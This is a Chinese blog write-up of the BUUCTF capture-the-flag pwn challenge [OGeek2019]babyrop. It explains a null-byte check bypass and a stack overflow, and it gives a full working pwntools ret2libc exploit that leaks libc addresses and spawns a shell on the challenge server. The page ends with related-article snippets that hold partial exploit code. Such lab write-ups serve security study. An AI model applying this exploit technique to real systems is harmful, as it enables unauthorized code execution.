BUUCTF Pwn [OGeek2019]babyrop 题解

最新推荐文章于 2025-01-28 15:16:35 发布
最新推荐文章于 2025-01-28 15:16:35 发布
阅读量484 收藏 1
点赞数 3
分类专栏: BUUCTF Pwn 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_33348179/article/details/144315873
版权

下载 checksec

32位 用IDA32打开

查看主函数 

读取字符串 如果最后一个数字和随机的数字不相等 就直接退出

所以要利用在字符串前加上 \x00   绕过长度检测 使14行的if不会执行


返回上一个函数字符串的第七个数 并比较是否=127 但是想要实现栈溢出 字符ASCII码必须要>231才行

所以要用到拓展ASCII码 取 \xff 

查看字符串 这题也没有后门函数 所以接下来就是ret2libc

exp:

from pwn import *
from LibcSearcher import *

p = remote("node5.buuoj.cn", 28178)
#p = process('./baby')
elf = ELF('./baby')
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = 0x8048825

payload = b'\x00' + b'\xff' * 7
p.sendline(payload)

p.recvuntil(b"Correct\n")
payload1 = b'a' * (0xe7 + 4) + p32(write_plt)  +  p32(main_addr) + p32(1) +  p32(write_got) + p32(4)
p.sendline(payload1)
write_addr = u32(p.recv(4))


print(hex(write_addr))

libc=ELF('./libc-2.23.so')
offset = write_addr - libc.symbols['write']
binsh = offset + libc.search(b'/bin/sh').__next__()
system = offset + libc.symbols['system']

payload2 = b'a' * (0xe7 + 4) + p32(system) + b'aaaa' + p32(binsh)

p.sendline(payload)

p.recvuntil(b"Correct\n")
p.sendline(payload2)

p.interactive()

运行 得到flag:flag{13b507a6-fb96-4d2d-ab7d-c8c3853dc8c4}

[OGeek2019]babyrop
迷风小白
02-09 1262
[OGeek2019]babyrop 查看程序的保护机制 发现是got表不可写的32位程序 拖进ida查看伪代码 sub_80486BB是初始化缓存区的函数 发现buf是一个随机数 发现函数中存在strncmp比较函数,其中buf为用户输入的值,&s为buf随机数,如果不相等则会退出程序,所以需要想办法绕过这个判断,所以v1的值必须为0 v1 = strlen(buf),strlen这个函数有个缺陷:遇到\x00直接截断。所以我们要输入第一位数为\x00 buf是一个7位数的数组,但函数中
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1545
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
ctf pwn 刷题记录 buuctf
m0_64195960的博客
04-11 392
[OGeek2019]babyrop 1 这题的知识点是一个ret2libc3和一个绕过随机数 1)checksec一下看一下保护 好的 2)丢尽ida看一下 1、首先是搞懂main函数 fd就是一个打开生成随机数文件 read函数将生成的随机数放到buf 然后进入第一个sub_804871F 2.瞧一瞧sub_804871F 1、memset的作用完成数组初始化,全部为0 2、sprintf的作用 原型 int sprintf( char *buffer, cons
BUUCTF [OGeek2019]babyrop
最新发布
2401_88087539的博客
01-28 762
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
BUUCTF--[OGeek2019]babyrop
N1rvana的博客
11-14 5095
才学习了基本的ROP流程,到处找题练,不过也没做出来几道题,以这道32位的题作为例题吧。 这道题是BUUCTFpwn练习题里的[OGeek2019]babyrop。 代码审计 老规矩先checksec一下: 没有canary保护,nx保护开启排除shellcode可能性,FULL RELEO为地址随机化。 观察主函数,先设定了一个闹铃,到时间就会强制退出程序,解除闹铃的方法在上一篇博客中提到过了, 这道题中闹铃函数依然对我们解题起不到什么干扰作用。 主函数的思路大概是:生成一个随机数,把这个随机数作为
BUUCTF pwn——[OGeek2019]babyrop
CNS-Enterprise BCC-1701-J
04-02 326
BUUCTF 做题练习
buuctf13-17题
XDiku的博客
01-29 216
ok
BUUCTF PWN OGeek2019 babyrop
Rt1Text的博客
05-01 440
1.checksec+运行 32位/ NX保护开启/ 还有Full RELRO 2.IDA进行中
buuctf-[OGeek2019]babyrop
weixin_44864859的博客
04-09 2415
查看主函数 int __cdecl main() { int buf; // [esp+4h] [ebp-14h] char v2; // [esp+Bh] [ebp-Dh] int fd; // [esp+Ch] [ebp-Ch] sub_80486BB(); fd = open("/dev/urandom", 0); if ( fd > 0 ) read...
软件如何画pcb螺丝孔_如何画函数图像(常见函数篇)——动态数学软件GeoGebra...
weixin_33397994的博客
01-13 548
在GeoGebra里,一输入表达式,函数图像瞬间出来。下面,我们来看看常见函数是如何输入的。分类普通函数例:f(x) = sin(2x),g(x) = x² + 2【直接输入“=”右边的式子即可】分别输入sin(2x) , x^2 + 2系数待定的函数【法一】输入表达式,再点“创建滑动条”例:f(x) = k x + b输入k x + b,再“创建滑动条”【法二】先创建滑动条,再输入表达式例:f(...
Buuctf(pwn)[OGeek2019]babyrop
半岛铁盒的博客
03-25 745
发现第二个函数有个read函数,但它是0x20是不能够构成漏洞利用,只是利用它作为中间的一个简单的输出即可; 跳过if判定: 只需在第一次输入时 在最前面加上 ‘\0’ a1上上一次返回的 buf[7] 这里的漏洞点利用, 要保证 a1的值尽可能的大, 这里选择的是 ‘xff’ – 255 该题目已经为我们提供了Libc Exp可以这样写 from pwn import * p = remote("node3.buuoj.cn",29829) libc=ELF('libc-2.23....
[BUUCTF]PWN7——[OGeek2019]babyrop
mcmuyanga的博客
08-25 1659
[BUUCTF]PWN7——[OGeek2019]babyrop 题目网址:https://buuoj.cn/challenges#[OGeek2019]babyrop 步骤: 例行检查,32位,开启了RELRO(对got表不可以写)和NX(堆栈不可执行) nc的时候没有什么回显,用32位ida打开附件,shift+f12查看程序里的字符串,没有发现system和/bin/sh 从main函数开始看程序 用户输入一个字符串给buf,然后跟随机数比较大小,strncmp里的比较长度的参数v1是我们输入
[OGeek2019]babyropBUUCTF
qq_41696518的博客
08-27 322
[OGeek2019]babyropBUUCTF
CTF buuoj pwn-----第8题:[OGeek2019]babyrop
bing_Max的博客
09-27 618
CTF buuoj pwn-----第8题:[OGeek2019]babyrop前言1. checksec2. 解题思路2.1 函数分析2.2 栈帧分析3. 编写EXP4. 运行EXP,获取flag 前言 梳理记录一下这道题的解题过程. 1. checksec bing@bing-virtual-machine:~/pwn$ checksec babyrop [*] '/home/bing/pwn/babyrop' Arch: i386-32-little RELRO: F
BUUCTF-Pwn-[OGeek2019]babyrop
餐桌上的猫
02-16 2231
题目截图 检查文件信息 开启了NX和Full RELOR 用IDA打开,反汇编查看主函数 查看函数sub_804871F buf[7]的大小为7个字节,而我们最多可以写入0x20个字节的数据,可以覆盖到v5,所以我们可以控制v5的值,在if判断中,如果buf中的字符串与s中的字符串不相同就会退出程序,但是v1控制strncmp函数比较的字符数,v1等于buf中字符串的长度,只要我们输入的数据以\0开始,v1就等于0,那么就可以绕过if判断 查看函数sub_80487D0 a1的值等于上一个函数中的
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值